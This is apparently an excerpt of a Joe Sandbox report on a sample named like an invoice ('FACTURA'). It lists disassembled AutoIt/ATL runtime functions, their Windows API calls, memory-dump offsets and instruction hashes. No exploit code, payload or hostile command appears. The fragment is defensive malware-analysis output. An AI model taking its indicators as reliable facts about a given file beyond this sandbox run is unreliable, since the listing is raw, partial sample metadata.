                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 2c26f1d658b6278c9cb10ebafe11ac31e3ebf1cb26ec538ea9c312c8a2ce5890
                                                                            • Instruction ID: 5ff9c93a9717c1b05c4b36ccf50a08af81df09ede589cf5ca8cec821b0a78e4b
                                                                            • Opcode Fuzzy Hash: 2c26f1d658b6278c9cb10ebafe11ac31e3ebf1cb26ec538ea9c312c8a2ce5890
                                                                            • Instruction Fuzzy Hash: 8301D472A41219ABCB14EBA0DD52EFE73A8DF15390F60001AB841732D1DE249E0DE672
                                                                            Function 00F28D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F28DEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 87bd335fc65565ae83de3d285f99036fe4ba5dc08a1672647bd17b362d30ca5e
                                                                            • Instruction ID: 6b8eee1a069889c22913eaad7ae193001e28491728c392251ee61958590a2508
                                                                            • Opcode Fuzzy Hash: 87bd335fc65565ae83de3d285f99036fe4ba5dc08a1672647bd17b362d30ca5e
                                                                            • Instruction Fuzzy Hash: 0A01F772A41219A7CB10F7A4D952EFE73A8DF11350F600016B841B3292DE258E0EF671
                                                                            Function 00F34F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: 5a4b16c3be12fefbcbcba14b1bd8cae8b5dd32145ed5217580f38035a7202c49
                                                                            • Instruction ID: 70bc777687418f2c341239d39157dafa31d90e865a4f117ccdbfd3b2655d00bb
                                                                            • Opcode Fuzzy Hash: 5a4b16c3be12fefbcbcba14b1bd8cae8b5dd32145ed5217580f38035a7202c49
                                                                            • Instruction Fuzzy Hash: CDE09232A0022C2AD720ABA9EC49AA7F7ACEB85B71F050067FD04D7051D960AA4587E1
                                                                            Function 00F0B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F0B314: _memset.LIBCMT ref: 00F0B321
                                                                              • Part of subcall function 00EF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(00F94158,00000000,00F94144,00F0B2F0,?,?,?,00ED100A), ref: 00EF0945
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00ED100A), ref: 00F0B2F4
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00ED100A), ref: 00F0B303
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F0B2FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 3158253471-631824599
                                                                            • Opcode ID: dcae7cedb43d202504caca785b907179b55a4e853567f95ac284d47b74dbef84
                                                                            • Instruction ID: 629d55f1038fccaf6ed8525e0201a6fd08bdbe8350d3356f57d2ebd442581610
                                                                            • Opcode Fuzzy Hash: dcae7cedb43d202504caca785b907179b55a4e853567f95ac284d47b74dbef84
                                                                            • Instruction Fuzzy Hash: 4DE06D706007048BD7609F28E8043467AE4AF40714F10CD6EE44AC7781E7B4D448EBA2
                                                                            Function 00F27C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F27C82
                                                                              • Part of subcall function 00EF3358: _doexit.LIBCMT ref: 00EF3362
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: cb7a4cdc829b2bb0ea4babf59ebdcac32df0acf13865192985b203759afcfec9
                                                                            • Instruction ID: de27c516da0fb7eaa099025254d6b6cd8a8028453bcfaf61f332e07c4645c4b9
                                                                            • Opcode Fuzzy Hash: cb7a4cdc829b2bb0ea4babf59ebdcac32df0acf13865192985b203759afcfec9
                                                                            • Instruction Fuzzy Hash: 5BD012327C931C36D21532B56C07BDA76888B15B52F141456BB08A95D349D18581A2E6
                                                                            Function 00F11935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00F11775
                                                                              • Part of subcall function 00F4BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F1195E,?), ref: 00F4BFFE
                                                                              • Part of subcall function 00F4BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C010
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F1196D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 582185067-3257408948
                                                                            • Opcode ID: 1fb9ba841b2ca204468c80559e01ac25a813c67c2ad029786d3bf0e566e4e44c
                                                                            • Instruction ID: 42c0f24193d7f8a6573c3d9bf37e7c7d424e1a23c7f4b7b5716694c1d1cf34a1
                                                                            • Opcode Fuzzy Hash: 1fb9ba841b2ca204468c80559e01ac25a813c67c2ad029786d3bf0e566e4e44c
                                                                            • Instruction Fuzzy Hash: 55F0C97180010DDFDB15DBA5C988BECBBF8BB08315F640096E712A2291D7758F89EF61
                                                                            Function 00F55998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F559AE
                                                                            • PostMessageW.USER32(00000000), ref: 00F559B5
                                                                              • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 8f0a663236dd4d69b4c3df3349b794208aa39b0e91c9133a996aeeab891d5e87
                                                                            • Instruction ID: 06a4a3f1d1d6e8f141419657847f70352e8029c61e7f5c17619490a06e4c3332
                                                                            • Opcode Fuzzy Hash: 8f0a663236dd4d69b4c3df3349b794208aa39b0e91c9133a996aeeab891d5e87
                                                                            • Instruction Fuzzy Hash: DAD0C9313C0315BBE664BB709D0BFD77A14AB45B61F040865B346AB1D0D9E4A804D654
                                                                            Function 00F55964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5596E
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F55981
                                                                              • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: c1880f236413c5978f2115d890c138ae0d4ee5483fa10e78a5f0cf85f0cdc58a
                                                                            • Instruction ID: 5a5844555c67bbe26375142638e127494e12f72819497333d2fd873832d9a00a
                                                                            • Opcode Fuzzy Hash: c1880f236413c5978f2115d890c138ae0d4ee5483fa10e78a5f0cf85f0cdc58a
                                                                            • Instruction Fuzzy Hash: D4D0C935384315B7E664BB709D0BFD77A14AB40B61F040865B34AAB1D0D9E49804D654